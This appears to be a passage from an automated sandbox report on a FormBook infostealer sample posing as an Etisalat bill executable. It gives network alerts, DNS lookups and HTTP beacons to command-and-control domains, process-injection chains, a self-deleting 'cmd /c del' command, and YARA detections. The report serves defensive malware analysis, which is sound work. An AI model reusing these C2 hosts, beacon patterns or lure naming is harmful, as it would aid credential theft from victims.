ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/28/24-15:08:47.165398 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49710 | 80 | 192.168.2.5 | 103.224.212.212
05/28/24-15:12:15.071010 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49716 | 80 | 192.168.2.5 | 155.248.232.116
05/28/24-15:09:06.832730 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.5 | 76.223.105.230
05/28/24-15:09:27.255123 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49712 | 80 | 192.168.2.5 | 13.248.169.48
05/28/24-15:11:10.766263 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 45.137.159.230
05/28/24-15:10:29.038585 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49714 | 80 | 192.168.2.5 | 169.239.128.46
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 28, 2024 15:08:47.159724951 CEST | 49710 | 80 | 192.168.2.5 | 103.224.212.212
May 28, 2024 15:08:47.165236950 CEST | 80 | 49710 | 103.224.212.212 | 192.168.2.5
May 28, 2024 15:08:47.165397882 CEST | 49710 | 80 | 192.168.2.5 | 103.224.212.212
May 28, 2024 15:08:47.165397882 CEST | 49710 | 80 | 192.168.2.5 | 103.224.212.212
May 28, 2024 15:08:47.171401978 CEST | 80 | 49710 | 103.224.212.212 | 192.168.2.5
May 28, 2024 15:08:47.661925077 CEST | 49710 | 80 | 192.168.2.5 | 103.224.212.212
May 28, 2024 15:08:47.669617891 CEST | 80 | 49710 | 103.224.212.212 | 192.168.2.5
May 28, 2024 15:08:47.669687986 CEST | 49710 | 80 | 192.168.2.5 | 103.224.212.212
May 28, 2024 15:09:06.826924086 CEST | 49711 | 80 | 192.168.2.5 | 76.223.105.230
May 28, 2024 15:09:06.832633972 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.5
May 28, 2024 15:09:06.832695961 CEST | 49711 | 80 | 192.168.2.5 | 76.223.105.230
May 28, 2024 15:09:06.832730055 CEST | 49711 | 80 | 192.168.2.5 | 76.223.105.230
May 28, 2024 15:09:06.838838100 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.5
May 28, 2024 15:09:07.309303999 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.5
May 28, 2024 15:09:07.309377909 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.5
May 28, 2024 15:09:07.309436083 CEST | 49711 | 80 | 192.168.2.5 | 76.223.105.230
May 28, 2024 15:09:07.309478998 CEST | 49711 | 80 | 192.168.2.5 | 76.223.105.230
May 28, 2024 15:09:07.314766884 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.5
May 28, 2024 15:09:27.249044895 CEST | 49712 | 80 | 192.168.2.5 | 13.248.169.48
May 28, 2024 15:09:27.254051924 CEST | 80 | 49712 | 13.248.169.48 | 192.168.2.5
May 28, 2024 15:09:27.255122900 CEST | 49712 | 80 | 192.168.2.5 | 13.248.169.48
May 28, 2024 15:09:27.255122900 CEST | 49712 | 80 | 192.168.2.5 | 13.248.169.48
May 28, 2024 15:09:27.260099888 CEST | 80 | 49712 | 13.248.169.48 | 192.168.2.5
May 28, 2024 15:09:27.774974108 CEST | 80 | 49712 | 13.248.169.48 | 192.168.2.5
May 28, 2024 15:09:27.775116920 CEST | 80 | 49712 | 13.248.169.48 | 192.168.2.5
May 28, 2024 15:09:27.780144930 CEST | 49712 | 80 | 192.168.2.5 | 13.248.169.48
May 28, 2024 15:09:28.486377954 CEST | 49712 | 80 | 192.168.2.5 | 13.248.169.48
May 28, 2024 15:09:28.491462946 CEST | 80 | 49712 | 13.248.169.48 | 192.168.2.5
May 28, 2024 15:09:47.772511959 CEST | 49713 | 80 | 192.168.2.5 | 190.115.24.78
May 28, 2024 15:09:47.777529955 CEST | 80 | 49713 | 190.115.24.78 | 192.168.2.5
May 28, 2024 15:09:47.777635098 CEST | 49713 | 80 | 192.168.2.5 | 190.115.24.78
May 28, 2024 15:09:47.777688026 CEST | 49713 | 80 | 192.168.2.5 | 190.115.24.78
May 28, 2024 15:09:47.782675982 CEST | 80 | 49713 | 190.115.24.78 | 192.168.2.5
May 28, 2024 15:09:48.270890951 CEST | 49713 | 80 | 192.168.2.5 | 190.115.24.78
May 28, 2024 15:09:48.276456118 CEST | 80 | 49713 | 190.115.24.78 | 192.168.2.5
May 28, 2024 15:09:48.276523113 CEST | 49713 | 80 | 192.168.2.5 | 190.115.24.78
May 28, 2024 15:10:29.032557011 CEST | 49714 | 80 | 192.168.2.5 | 169.239.128.46
May 28, 2024 15:10:29.038444996 CEST | 80 | 49714 | 169.239.128.46 | 192.168.2.5
May 28, 2024 15:10:29.038522959 CEST | 49714 | 80 | 192.168.2.5 | 169.239.128.46
May 28, 2024 15:10:29.038584948 CEST | 49714 | 80 | 192.168.2.5 | 169.239.128.46
May 28, 2024 15:10:29.043755054 CEST | 80 | 49714 | 169.239.128.46 | 192.168.2.5
May 28, 2024 15:10:29.552393913 CEST | 49714 | 80 | 192.168.2.5 | 169.239.128.46
May 28, 2024 15:10:29.603421926 CEST | 80 | 49714 | 169.239.128.46 | 192.168.2.5
May 28, 2024 15:10:29.667685986 CEST | 80 | 49714 | 169.239.128.46 | 192.168.2.5
May 28, 2024 15:10:29.667742014 CEST | 49714 | 80 | 192.168.2.5 | 169.239.128.46
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 28, 2024 15:08:26.631820917 CEST | 51824 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:08:26.787580013 CEST | 53 | 51824 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:08:46.849637032 CEST | 54857 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:08:47.158876896 CEST | 53 | 54857 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:09:06.662199020 CEST | 61636 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:09:06.826344967 CEST | 53 | 61636 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:09:27.181816101 CEST | 51810 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:09:27.216989994 CEST | 53 | 51810 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:09:47.599453926 CEST | 62155 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:09:47.770979881 CEST | 53 | 62155 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:10:08.350821018 CEST | 60263 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:10:08.386358023 CEST | 53 | 60263 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:10:29.008150101 CEST | 54318 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:10:29.031981945 CEST | 53 | 54318 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:10:49.397145033 CEST | 52273 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:10:49.407679081 CEST | 53 | 52273 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:11:10.687024117 CEST | 49236 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:11:10.760549068 CEST | 53 | 49236 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:11:52.360460043 CEST | 63597 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:11:52.722146988 CEST | 53 | 63597 | 1.1.1.1 | 192.168.2.5
May 28, 2024 15:12:15.040112972 CEST | 52682 | 53 | 192.168.2.5 | 1.1.1.1
May 28, 2024 15:12:15.055402994 CEST | 53 | 52682 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 28, 2024 15:08:26.631820917 CEST | 192.168.2.5 | 1.1.1.1 | 0xc8db | Standard query (0) | www.usedata.monster | A (IP address) | IN (0x0001) | false
May 28, 2024 15:08:46.849637032 CEST | 192.168.2.5 | 1.1.1.1 | 0x7ef | Standard query (0) | www.vietcadao.com | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:06.662199020 CEST | 192.168.2.5 | 1.1.1.1 | 0xc336 | Standard query (0) | www.micheleditrana.com | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:27.181816101 CEST | 192.168.2.5 | 1.1.1.1 | 0x44d8 | Standard query (0) | www.aerotyneholdings.com | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:47.599453926 CEST | 192.168.2.5 | 1.1.1.1 | 0x37e1 | Standard query (0) | www.1wxir.com | A (IP address) | IN (0x0001) | false
May 28, 2024 15:10:08.350821018 CEST | 192.168.2.5 | 1.1.1.1 | 0xbc82 | Standard query (0) | www.rlyadventures.com | A (IP address) | IN (0x0001) | false
May 28, 2024 15:10:29.008150101 CEST | 192.168.2.5 | 1.1.1.1 | 0x6aed | Standard query (0) | www.myconc.pro | A (IP address) | IN (0x0001) | false
May 28, 2024 15:10:49.397145033 CEST | 192.168.2.5 | 1.1.1.1 | 0x95d6 | Standard query (0) | www.flickzbiz.fun | A (IP address) | IN (0x0001) | false
May 28, 2024 15:11:10.687024117 CEST | 192.168.2.5 | 1.1.1.1 | 0x8750 | Standard query (0) | www.openshiftstore.com | A (IP address) | IN (0x0001) | false
May 28, 2024 15:11:52.360460043 CEST | 192.168.2.5 | 1.1.1.1 | 0x3f77 | Standard query (0) | www.sercettopper.com | A (IP address) | IN (0x0001) | false
May 28, 2024 15:12:15.040112972 CEST | 192.168.2.5 | 1.1.1.1 | 0xe720 | Standard query (0) | www.kas-travel.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 28, 2024 15:08:26.787580013 CEST | 1.1.1.1 | 192.168.2.5 | 0xc8db | Name error (3) | www.usedata.monster | none | none | A (IP address) | IN (0x0001) | false
May 28, 2024 15:08:47.158876896 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ef | No error (0) | www.vietcadao.com | | 103.224.212.212 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:06.826344967 CEST | 1.1.1.1 | 192.168.2.5 | 0xc336 | No error (0) | www.micheleditrana.com | micheleditrana.com | | CNAME (Canonical name) | IN (0x0001) | false
May 28, 2024 15:09:06.826344967 CEST | 1.1.1.1 | 192.168.2.5 | 0xc336 | No error (0) | micheleditrana.com | | 76.223.105.230 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:06.826344967 CEST | 1.1.1.1 | 192.168.2.5 | 0xc336 | No error (0) | micheleditrana.com | | 13.248.243.5 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:27.216989994 CEST | 1.1.1.1 | 192.168.2.5 | 0x44d8 | No error (0) | www.aerotyneholdings.com | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:27.216989994 CEST | 1.1.1.1 | 192.168.2.5 | 0x44d8 | No error (0) | www.aerotyneholdings.com | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:09:47.770979881 CEST | 1.1.1.1 | 192.168.2.5 | 0x37e1 | No error (0) | www.1wxir.com | | 190.115.24.78 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:10:08.386358023 CEST | 1.1.1.1 | 192.168.2.5 | 0xbc82 | Name error (3) | www.rlyadventures.com | none | none | A (IP address) | IN (0x0001) | false
May 28, 2024 15:10:29.031981945 CEST | 1.1.1.1 | 192.168.2.5 | 0x6aed | No error (0) | www.myconc.pro | | 169.239.128.46 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:10:49.407679081 CEST | 1.1.1.1 | 192.168.2.5 | 0x95d6 | Name error (3) | www.flickzbiz.fun | none | none | A (IP address) | IN (0x0001) | false
May 28, 2024 15:11:10.760549068 CEST | 1.1.1.1 | 192.168.2.5 | 0x8750 | No error (0) | www.openshiftstore.com | openshiftstore.com | | CNAME (Canonical name) | IN (0x0001) | false
May 28, 2024 15:11:10.760549068 CEST | 1.1.1.1 | 192.168.2.5 | 0x8750 | No error (0) | openshiftstore.com | | 45.137.159.230 | A (IP address) | IN (0x0001) | false
May 28, 2024 15:12:15.055402994 CEST | 1.1.1.1 | 192.168.2.5 | 0xe720 | No error (0) | www.kas-travel.com | | 155.248.232.116 | A (IP address) | IN (0x0001) | false
                                    • www.vietcadao.com
                                    • www.micheleditrana.com
                                    • www.aerotyneholdings.com
                                    • www.1wxir.com
                                    • www.myconc.pro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49710 | 103.224.212.212 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 28, 2024 15:08:47.165397882 CEST | 164 | OUT | GET /da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert HTTP/1.1
                                    Host: www.vietcadao.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49711 | 76.223.105.230 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 28, 2024 15:09:06.832730055 CEST | 169 | OUT | GET /da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb HTTP/1.1
                                    Host: www.micheleditrana.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
May 28, 2024 15:09:07.309303999 CEST | 418 | IN | HTTP/1.1 301 Moved Permanently
                                    location: https://micheleditrana.com/da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb
                                    vary: Accept-Encoding
                                    server: DPS/2.0.0+sha-b4bc716
                                    x-version: b4bc716
                                    x-siteid: us-east-1
                                    set-cookie: dps_site_id=us-east-1; path=/
                                    date: Tue, 28 May 2024 13:09:07 GMT
                                    keep-alive: timeout=5
                                    transfer-encoding: chunked
                                    connection: close
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49712 | 13.248.169.48 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 28, 2024 15:09:27.255122900 CEST | 171 | OUT | GET /da29/?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert HTTP/1.1
                                    Host: www.aerotyneholdings.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
May 28, 2024 15:09:27.774974108 CEST | 344 | IN | HTTP/1.1 200 OK
                                    Server: openresty
                                    Date: Tue, 28 May 2024 13:09:27 GMT
                                    Content-Type: text/html
                                    Content-Length: 204
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 6c 3d 7a 4d 6b 62 58 6c 41 6a 42 41 68 55 7a 58 32 49 48 79 31 31 62 50 70 62 69 2b 4a 6f 49 53 61 33 66 33 56 4b 30 39 64 77 68 49 61 76 77 4e 4a 62 59 78 38 38 41 54 55 32 70 4d 42 73 32 34 71 38 6f 51 7a 41 26 32 64 71 68 6c 3d 52 32 4d 6c 56 78 50 38 65 72 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49713 | 190.115.24.78 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 28, 2024 15:09:47.777688026 CEST | 160 | OUT | GET /da29/?2dqhl=R2MlVxP8ert&6l=R0vht/u//GQkKJnhnDzhccCvBPqy5ItmLDFelNY6QmkspbEKZfPP+/bGeDfLPfj4cOFx HTTP/1.1
                                    Host: www.1wxir.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49714 | 169.239.128.46 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 28, 2024 15:10:29.038584948 CEST | 161 | OUT | GET /da29/?2dqhl=R2MlVxP8ert&6l=IK1SFyt5vgXTEdWXyzXhj/+ddmg0nYKJwLobMWZqnGcsuxwYcVM7IV3LfBY9TbKtfD67 HTTP/1.1
                                    Host: www.myconc.pro
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Target ID:0
                                    Start time:09:07:46
                                    Start date:28/05/2024
                                    Path:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
                                    Imagebase:0xb60000
                                    File size:1'062'400 bytes
                                    MD5 hash:AA15C6BC55041B534268E0A07C5F0ABC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:09:07:47
                                    Start date:28/05/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
                                    Imagebase:0x940000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:3
                                    Start time:09:07:48
                                    Start date:28/05/2024
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff674740000
                                    File size:5'141'208 bytes
                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4443389899.0000000010977000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:09:07:51
                                    Start date:28/05/2024
                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\cmstp.exe"
                                    Imagebase:0xad0000
                                    File size:81'920 bytes
                                    MD5 hash:D7AABFAB5BEFD53BA3A27BD48F3CC675
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:5
                                    Start time:09:07:54
                                    Start date:28/05/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                    Imagebase:0x790000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:09:07:54
                                    Start date:28/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:4%
                                      Dynamic/Decrypted Code Coverage:0.4%
                                      Signature Coverage:5.6%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:165
